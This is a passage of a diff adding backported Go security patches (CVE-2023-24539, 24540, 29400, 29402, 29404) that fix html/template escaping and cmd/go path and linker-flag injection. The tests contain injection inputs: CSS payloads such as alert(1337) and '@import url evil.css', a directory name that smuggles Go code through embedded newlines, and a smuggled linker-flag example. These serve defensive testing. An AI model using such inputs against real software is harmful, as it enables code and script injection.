+- t.Errorf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
+- continue
+- }
+- b.Reset()
+- if err := tmpl.Execute(b, pdata); err != nil {
+- t.Errorf("%s: template execution failed for pointer: %s", test.name, err)
+- continue
+- }
+- if w, g := test.output, b.String(); w != g {
+- t.Errorf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
+- continue
+- }
+- if tmpl.Tree != tmpl.text.Tree {
+- t.Errorf("%s: tree mismatch", test.name)
+- continue
+- }
++ t.Run(test.name, func(t *testing.T) {
++ tmpl := New(test.name)
++ tmpl = Must(tmpl.Parse(test.input))
++ // Check for bug 6459: Tree field was not set in Parse.
++ if tmpl.Tree != tmpl.text.Tree {
++ t.Fatalf("%s: tree not set properly", test.name)
++ }
++ b := new(strings.Builder)
++ if err := tmpl.Execute(b, data); err != nil {
++ t.Fatalf("%s: template execution failed: %s", test.name, err)
++ }
++ if w, g := test.output, b.String(); w != g {
++ t.Fatalf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
++ }
++ b.Reset()
++ if err := tmpl.Execute(b, pdata); err != nil {
++ t.Fatalf("%s: template execution failed for pointer: %s", test.name, err)
++ }
++ if w, g := test.output, b.String(); w != g {
++ t.Fatalf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
++ }
++ if tmpl.Tree != tmpl.text.Tree {
++ t.Fatalf("%s: tree mismatch", test.name)
++ }
++ })
+ }
+ }
+
+@@ -936,6 +932,10 @@ func TestErrors(t *testing.T) {
+ "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
+ "",
+ },
++ {
++ "<script>var a = `${a+b}`</script>`",
++ "",
++ },
+ // Error cases.
+ {
+ "{{if .Cond}}<a{{end}}",
+@@ -1082,6 +1082,10 @@ func TestErrors(t *testing.T) {
+ // html is allowed since it is the last command in the pipeline, but urlquery is not.
+ `predefined escaper "urlquery" disallowed in template`,
+ },
++ {
++ "<script>var tmpl = `asd {{.}}`;</script>",
++ `{{.}} appears in a JS template literal`,
++ },
+ }
+ for _, test := range tests {
+ buf := new(bytes.Buffer)
+@@ -1304,6 +1308,10 @@ func TestEscapeText(t *testing.T) {
+ context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+ },
+ {
++ "<a onclick=\"`foo",
++ context{state: stateJSBqStr, delim: delimDoubleQuote, attr: attrScript},
++ },
++ {
+ `<A ONCLICK="'`,
+ context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+ },
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index ea9c183..b888eaf 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -308,6 +308,7 @@ var jsStrReplacementTable = []string{
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+ '"': `\u0022`,
++ '`': `\u0060`,
+ '&': `\u0026`,
+ '\'': `\u0027`,
+ '+': `\u002b`,
+@@ -331,6 +332,7 @@ var jsStrNormReplacementTable = []string{
+ '"': `\u0022`,
+ '&': `\u0026`,
+ '\'': `\u0027`,
++ '`': `\u0060`,
+ '+': `\u002b`,
+ '/': `\/`,
+ '<': `\u003c`,
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index d7ee47b..7d963ae 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -292,7 +292,7 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+ `0123456789:;\u003c=\u003e?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ[\\]^_` +
+- "`abcdefghijklmno" +
++ "\\u0060abcdefghijklmno" +
+ "pqrstuvwxyz{|}~\u007f" +
+ "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+ },
+diff --git a/src/html/template/jsctx_string.go b/src/html/template/jsctx_string.go
+index dd1d87e..2394893 100644
+--- a/src/html/template/jsctx_string.go
++++ b/src/html/template/jsctx_string.go
+@@ -4,6 +4,15 @@ package template
+
+ import "strconv"
+
++func _() {
++ // An "invalid array index" compiler error signifies that the constant values have changed.
++ // Re-run the stringer command to generate them again.
++ var x [1]struct{}
++ _ = x[jsCtxRegexp-0]
++ _ = x[jsCtxDivOp-1]
++ _ = x[jsCtxUnknown-2]
++}
++
+ const _jsCtx_name = "jsCtxRegexpjsCtxDivOpjsCtxUnknown"
+
+ var _jsCtx_index = [...]uint8{0, 11, 21, 33}
+diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
+index 05104be..6fb1a6e 100644
+--- a/src/html/template/state_string.go
++++ b/src/html/template/state_string.go
+@@ -4,9 +4,42 @@ package template
+
+ import "strconv"
+
+-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateError"
++func _() {
++ // An "invalid array index" compiler error signifies that the constant values have changed.
++ // Re-run the stringer command to generate them again.
++ var x [1]struct{}
++ _ = x[stateText-0]
++ _ = x[stateTag-1]
++ _ = x[stateAttrName-2]
++ _ = x[stateAfterName-3]
++ _ = x[stateBeforeValue-4]
++ _ = x[stateHTMLCmt-5]
++ _ = x[stateRCDATA-6]
++ _ = x[stateAttr-7]
++ _ = x[stateURL-8]
++ _ = x[stateSrcset-9]
++ _ = x[stateJS-10]
++ _ = x[stateJSDqStr-11]
++ _ = x[stateJSSqStr-12]
++ _ = x[stateJSBqStr-13]
++ _ = x[stateJSRegexp-14]
++ _ = x[stateJSBlockCmt-15]
++ _ = x[stateJSLineCmt-16]
++ _ = x[stateCSS-17]
++ _ = x[stateCSSDqStr-18]
++ _ = x[stateCSSSqStr-19]
++ _ = x[stateCSSDqURL-20]
++ _ = x[stateCSSSqURL-21]
++ _ = x[stateCSSURL-22]
++ _ = x[stateCSSBlockCmt-23]
++ _ = x[stateCSSLineCmt-24]
++ _ = x[stateError-25]
++ _ = x[stateDead-26]
++}
++
++const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
+
+-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 155, 170, 184, 192, 205, 218, 231, 244, 255, 271, 286, 296}
++var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
+
+ func (i state) String() string {
+ if i >= state(len(_state_index)-1) {
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 06df679..92eb351 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -27,6 +27,7 @@ var transitionFunc = [...]func(context, []byte) (context, int){
+ stateJS: tJS,
+ stateJSDqStr: tJSDelimited,
+ stateJSSqStr: tJSDelimited,
++ stateJSBqStr: tJSDelimited,
+ stateJSRegexp: tJSDelimited,
+ stateJSBlockCmt: tBlockCmt,
+ stateJSLineCmt: tLineCmt,
+@@ -262,7 +263,7 @@ func tURL(c context, s []byte) (context, int) {
+
+ // tJS is the context transition function for the JS state.
+ func tJS(c context, s []byte) (context, int) {
+- i := bytes.IndexAny(s, `"'/`)
++ i := bytes.IndexAny(s, "\"`'/")
+ if i == -1 {
+ // Entire input is non string, comment, regexp tokens.
+ c.jsCtx = nextJSCtx(s, c.jsCtx)
+@@ -274,6 +275,8 @@ func tJS(c context, s []byte) (context, int) {
+ c.state, c.jsCtx = stateJSDqStr, jsCtxRegexp
+ case '\'':
+ c.state, c.jsCtx = stateJSSqStr, jsCtxRegexp
++ case '`':
++ c.state, c.jsCtx = stateJSBqStr, jsCtxRegexp
+ case '/':
+ switch {
+ case i+1 < len(s) && s[i+1] == '/':
+@@ -303,6 +306,8 @@ func tJSDelimited(c context, s []byte) (context, int) {
+ switch c.state {
+ case stateJSSqStr:
+ specials = `\'`
++ case stateJSBqStr:
++ specials = "`\\"
+ case stateJSRegexp:
+ specials = `\/[]`
+ }
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
new file mode 100644
index 0000000000..281b6486a8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
@@ -0,0 +1,60 @@
+From 8673ca81e5340b87709db2d9749c92a3bf925df1 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 13 Apr 2023 15:40:44 -0700
+Subject: [PATCH] html/template: disallow angle brackets in CSS values
+
+Angle brackets should not appear in CSS contexts, as they may affect
+token boundaries (such as closing a <style> tag, resulting in
+injection). Instead emit filterFailsafe, matching the behavior for other
+dangerous characters.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #59720
+Fixes CVE-2023-24539
+
+Change-Id: Iccc659c9a18415992b0c05c178792228e3a7bae4
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826636
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491615
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/8673ca81e5340b87709db2d9749c92a3bf925df1]
+CVE: CVE-2023-24539
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ src/html/template/css.go | 2 +-
+ src/html/template/css_test.go | 2 ++
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/html/template/css.go b/src/html/template/css.go
+index 890a0c6b227fe..f650d8b3e843a 100644
+--- a/src/html/template/css.go
++++ b/src/html/template/css.go
+@@ -238,7 +238,7 @@ func cssValueFilter(args ...any) string {
+ // inside a string that might embed JavaScript source.
+ for i, c := range b {
+ switch c {
+- case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}':
++ case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}', '<', '>':
+ return filterFailsafe
+ case '-':
+ // Disallow <!-- or -->.
+diff --git a/src/html/template/css_test.go b/src/html/template/css_test.go
+index a735638b0314f..2b76256a766e9 100644
+--- a/src/html/template/css_test.go
++++ b/src/html/template/css_test.go
+@@ -231,6 +231,8 @@ func TestCSSValueFilter(t *testing.T) {
+ {`-exp\000052 ession(alert(1337))`, "ZgotmplZ"},
+ {`-expre\0000073sion`, "-expre\x073sion"},
+ {`@import url evil.css`, "ZgotmplZ"},
++ {"<", "ZgotmplZ"},
++ {">", "ZgotmplZ"},
+ }
+ for _, test := range tests {
+ got := cssValueFilter(test.css)
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
new file mode 100644
index 0000000000..799a0dfcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
@@ -0,0 +1,90 @@
+From ce7bd33345416e6d8cac901792060591cafc2797 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Tue, 11 Apr 2023 16:27:43 +0100
+Subject: [PATCH] [release-branch.go1.19] html/template: handle all JS
+ whitespace characters
+
+Rather than just a small set. Character class as defined by \s [0].
+
+Thanks to Juho Nurminen of Mattermost for reporting this.
+
+For #59721
+Fixes #59813
+Fixes CVE-2023-24540
+
+[0] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions/Character_Classes
+
+Change-Id: I56d4fa1ef08125b417106ee7dbfb5b0923b901ba
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1821459
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1851497
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+TryBot-Bypass: Carlos Amedee <carlos@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ce7bd33345416e6d8cac901792060591cafc2797]
+CVE: CVE-2023-24540
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go | 8 +++++++-
+ src/html/template/js_test.go | 11 +++++++----
+ 2 files changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index fe7054efe5cd8..4e05c1455723f 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -13,6 +13,11 @@ import (
+ "unicode/utf8"
+ )
+
++// jsWhitespace contains all of the JS whitespace characters, as defined
++// by the \s character class.
++// See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions/Character_classes.
++const jsWhitespace = "\f\n\r\t\v\u0020\u00a0\u1680\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007\u2008\u2009\u200a\u2028\u2029\u202f\u205f\u3000\ufeff"
++
+ // nextJSCtx returns the context that determines whether a slash after the
+ // given run of tokens starts a regular expression instead of a division
+ // operator: / or /=.
+@@ -26,7 +31,8 @@ import (
+ // JavaScript 2.0 lexical grammar and requires one token of lookbehind:
+ // https://www.mozilla.org/js/language/js20-2000-07/rationale/syntax.html
+ func nextJSCtx(s []byte, preceding jsCtx) jsCtx {
+- s = bytes.TrimRight(s, "\t\n\f\r \u2028\u2029")
++ // Trim all JS whitespace characters
++ s = bytes.TrimRight(s, jsWhitespace)
+ if len(s) == 0 {
+ return preceding
+ }
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index e07c695f7a77d..e52180cc113b5 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -81,14 +81,17 @@ func TestNextJsCtx(t *testing.T) {
+ {jsCtxDivOp, "0"},
+ // Dots that are part of a number are div preceders.
+ {jsCtxDivOp, "0."},
++ // Some JS interpreters treat NBSP as a normal space, so
++ // we must too in order to properly escape things.
++ {jsCtxRegexp, "=\u00A0"},
+ }
+
+ for _, test := range tests {
+- if nextJSCtx([]byte(test.s), jsCtxRegexp) != test.jsCtx {
+- t.Errorf("want %s got %q", test.jsCtx, test.s)
++ if ctx := nextJSCtx([]byte(test.s), jsCtxRegexp); ctx != test.jsCtx {
++ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ }
+- if nextJSCtx([]byte(test.s), jsCtxDivOp) != test.jsCtx {
+- t.Errorf("want %s got %q", test.jsCtx, test.s)
++ if ctx := nextJSCtx([]byte(test.s), jsCtxDivOp); ctx != test.jsCtx {
++ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ }
+ }
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
new file mode 100644
index 0000000000..092c7aa0ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
@@ -0,0 +1,94 @@
+From 0d347544cbca0f42b160424f6bc2458ebcc7b3fc Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 13 Apr 2023 14:01:50 -0700
+Subject: [PATCH] html/template: emit filterFailsafe for empty unquoted attr
+ value
+
+An unquoted action used as an attribute value can result in unsafe
+behavior if it is empty, as HTML normalization will result in unexpected
+attributes, and may allow attribute injection. If executing a template
+results in a empty unquoted attribute value, emit filterFailsafe
+instead.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #59722
+Fixes CVE-2023-29400
+
+Change-Id: Ia38d1b536ae2b4af5323a6c6d861e3c057c2570a
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826631
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491617
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/0d347544cbca0f42b160424f6bc2458ebcc7b3fc]
+CVE: CVE-2023-29400
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ src/html/template/escape.go | 5 ++---
+ src/html/template/escape_test.go | 15 +++++++++++++++
+ src/html/template/html.go | 3 +++
+ 3 files changed, 20 insertions(+), 3 deletions(-)
+
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 4ba1d6b31897e..a62ef159f0dcd 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -382,9 +382,8 @@ func normalizeEscFn(e string) string {
+ // for all x.
+ var redundantFuncs = map[string]map[string]bool{
+ "_html_template_commentescaper": {
+- "_html_template_attrescaper": true,
+- "_html_template_nospaceescaper": true,
+- "_html_template_htmlescaper": true,
++ "_html_template_attrescaper": true,
++ "_html_template_htmlescaper": true,
+ },
+ "_html_template_cssescaper": {
+ "_html_template_attrescaper": true,
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index 3dd212bac9406..f8b2b448f2dfa 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -678,6 +678,21 @@ func TestEscape(t *testing.T) {
+ `<img srcset={{",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"}}>`,
+ `<img srcset=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,>`,
+ },
++ {
++ "unquoted empty attribute value (plaintext)",
++ "<p name={{.U}}>",
++ "<p name=ZgotmplZ>",
++ },
++ {
++ "unquoted empty attribute value (url)",
++ "<p href={{.U}}>",
++ "<p href=ZgotmplZ>",
++ },
++ {
++ "quoted empty attribute value",
++ "<p name=\"{{.U}}\">",
++ "<p name=\"\">",
++ },
+ }
+
+ for _, test := range tests {
+diff --git a/src/html/template/html.go b/src/html/template/html.go
+index bcca0b51a0ef9..a181699a5bda8 100644
+--- a/src/html/template/html.go
++++ b/src/html/template/html.go
+@@ -14,6 +14,9 @@ import (
+ // htmlNospaceEscaper escapes for inclusion in unquoted attribute values.
+ func htmlNospaceEscaper(args ...interface{}) string {
+ s, t := stringify(args...)
++ if s == "" {
++ return filterFailsafe
++ }
+ if t == contentTypeHTML {
+ return htmlReplacer(stripTags(s), htmlNospaceNormReplacementTable, false)
+ }
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
new file mode 100644
index 0000000000..01eed9fe1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
@@ -0,0 +1,201 @@
+rom c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001
+From: "Bryan C. Mills" <bcmills@google.com>
+Date: Fri, 12 May 2023 14:15:16 -0400
+Subject: [PATCH] [release-branch.go1.19] cmd/go: disallow package directories
+ containing newlines
+
+Directory or file paths containing newlines may cause tools (such as
+cmd/cgo) that emit "//line" or "#line" -directives to write part of
+the path into non-comment lines in generated source code. If those
+lines contain valid Go code, it may be injected into the resulting
+binary.
+
+(Note that Go import paths and file paths within module zip files
+already could not contain newlines.)
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60167.
+Fixes #60515.
+Fixes CVE-2023-29402.
+
+Change-Id: If55d0400c02beb7a5da5eceac60f1abeac99f064
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1882606
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 41f9046495564fc728d6f98384ab7276450ac7e2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902229
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904343
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501218
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c160b49b6d328c86bd76ca2fff9009a71347333f]
+CVE: CVE-2023-29402
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/load/pkg.go | 4 +
+ src/cmd/go/internal/work/exec.go | 6 ++
+ src/cmd/go/script_test.go | 1 +
+ .../go/testdata/script/build_cwd_newline.txt | 100 ++++++++++++++++++
+ 4 files changed, 111 insertions(+)
+ create mode 100644 src/cmd/go/testdata/script/build_cwd_newline.txt
+
+diff --git a/src/cmd/go/internal/load/pkg.go b/src/cmd/go/internal/load/pkg.go
+index 369a79b..d2b63b0 100644
+--- a/src/cmd/go/internal/load/pkg.go
++++ b/src/cmd/go/internal/load/pkg.go
+@@ -1697,6 +1697,10 @@ func (p *Package) load(stk *ImportStack, bp *build.Package, err error) {
+ setError(ImportErrorf(p.ImportPath, "invalid import path %q", p.ImportPath))
+ return
+ }
++ if strings.ContainsAny(p.Dir, "\r\n") {
++ setError(fmt.Errorf("invalid package directory %q", p.Dir))
++ return
++ }
+
+ // Build list of imported packages and full dependency list.
+ imports := make([]*Package, 0, len(p.Imports))
+diff --git a/src/cmd/go/internal/work/exec.go b/src/cmd/go/internal/work/exec.go
+index 9a9650b..050b785 100644
+--- a/src/cmd/go/internal/work/exec.go
++++ b/src/cmd/go/internal/work/exec.go
+@@ -458,6 +458,12 @@ func (b *Builder) build(a *Action) (err error) {
+ b.Print(a.Package.ImportPath + "\n")
+ }
+
++ if p.Error != nil {
++ // Don't try to build anything for packages with errors. There may be a
++ // problem with the inputs that makes the package unsafe to build.
++ return p.Error
++ }
++
+ if a.Package.BinaryOnly {
+ p.Stale = true
+ p.StaleReason = "binary-only packages are no longer supported"
+diff --git a/src/cmd/go/script_test.go b/src/cmd/go/script_test.go
+index ec498bb..a1398ad 100644
+--- a/src/cmd/go/script_test.go
++++ b/src/cmd/go/script_test.go
+@@ -123,6 +123,7 @@ func (ts *testScript) setup() {
+ "devnull=" + os.DevNull,
+ "goversion=" + goVersion(ts),
+ ":=" + string(os.PathListSeparator),
++ "newline=\n",
+ }
+
+ if runtime.GOOS == "plan9" {
+diff --git a/src/cmd/go/testdata/script/build_cwd_newline.txt b/src/cmd/go/testdata/script/build_cwd_newline.txt
+new file mode 100644
+index 0000000..61c6966
+--- /dev/null
++++ b/src/cmd/go/testdata/script/build_cwd_newline.txt
+@@ -0,0 +1,100 @@
++[windows] skip 'filesystem normalizes / to \'
++[plan9] skip 'filesystem disallows \n in paths'
++
++# If the directory path containing a package to be built includes a newline,
++# the go command should refuse to even try to build the package.
++
++env DIR=$WORK${/}${newline}'package main'${newline}'func main() { panic("uh-oh")'${newline}'/*'
++
++mkdir $DIR
++cd $DIR
++exec pwd
++cp $WORK/go.mod ./go.mod
++cp $WORK/main.go ./main.go
++cp $WORK/main_test.go ./main_test.go
++
++! go build -o $devnull .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go build -o $devnull main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go run .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go run main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go test .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go test -v main.go main_test.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++
++# Since we do preserve $PWD (or set it appropriately) for commands, and we do
++# not resolve symlinks unnecessarily, referring to the contents of the unsafe
++# directory via a safe symlink should be ok, and should not inject the data from
++# the symlink target path.
++
++[!symlink] stop 'remainder of test checks symlink behavior'
++[short] stop 'links and runs binaries'
++
++symlink $WORK${/}link -> $DIR
++
++go run $WORK${/}link${/}main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v $WORK${/}link${/}main.go $WORK${/}link${/}main_test.go
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++cd $WORK/link
++
++! go run $DIR${/}main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++go run .
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go run main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++go test -v .
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++
++-- $WORK/go.mod --
++module example
++go 1.19
++-- $WORK/main.go --
++package main
++
++import "C"
++
++func main() {
++ /* nothing here */
++ println("ok")
++}
++-- $WORK/main_test.go --
++package main
++
++import "testing"
++
++func TestMain(*testing.M) {
++ main()
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
new file mode 100644
index 0000000000..61336ee9ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
@@ -0,0 +1,84 @@
+From bf3c8ce03e175e870763901a3850bca01381a828 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Fri, 5 May 2023 13:10:34 -0700
+Subject: [PATCH] [release-branch.go1.19] cmd/go: enforce flags with
+ non-optional arguments
+
+Enforce that linker flags which expect arguments get them, otherwise it
+may be possible to smuggle unexpected flags through as the linker can
+consume what looks like a flag as an argument to a preceding flag (i.e.
+"-Wl,-O -Wl,-R,-bad-flag" is interpreted as "-O=-R -bad-flag"). Also be
+somewhat more restrictive in the general format of some flags.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60305
+Fixes #60511
+Fixes CVE-2023-29404
+
+Change-Id: Icdffef2c0f644da50261cace6f43742783931cff
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1876275
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 896779503cf754cbdac24b61d4cc953b50fe2dde)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902225
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904342
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501217
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+Run-TryBot: David Chase <drchase@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf3c8ce03e175e870763901a3850bca01381a828]
+CVE: CVE-2023-29404
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/work/security.go | 6 +++---
+ src/cmd/go/internal/work/security_test.go | 5 +++++
+ 2 files changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/src/cmd/go/internal/work/security.go b/src/cmd/go/internal/work/security.go
+index a823b20..8acb6dc 100644
+--- a/src/cmd/go/internal/work/security.go
++++ b/src/cmd/go/internal/work/security.go
+@@ -177,17 +177,17 @@ var validLinkerFlags = []*lazyregexp.Regexp{
+ re(`-Wl,-Bdynamic`),
+ re(`-Wl,-berok`),
+ re(`-Wl,-Bstatic`),
+- re(`-WL,-O([^@,\-][^,]*)?`),
++ re(`-Wl,-O[0-9]+`),
+ re(`-Wl,-d[ny]`),
+ re(`-Wl,--disable-new-dtags`),
+- re(`-Wl,-e[=,][a-zA-Z0-9]*`),
++ re(`-Wl,-e[=,][a-zA-Z0-9]+`),
+ re(`-Wl,--enable-new-dtags`),
+ re(`-Wl,--end-group`),
+ re(`-Wl,--(no-)?export-dynamic`),
+ re(`-Wl,-framework,[^,@\-][^,]+`),
+ re(`-Wl,-headerpad_max_install_names`),
+ re(`-Wl,--no-undefined`),
+- re(`-Wl,-R([^@\-][^,@]*$)`),
++ re(`-Wl,-R,?([^@\-,][^,@]*$)`),
+ re(`-Wl,--just-symbols[=,]([^,@\-][^,@]+)`),
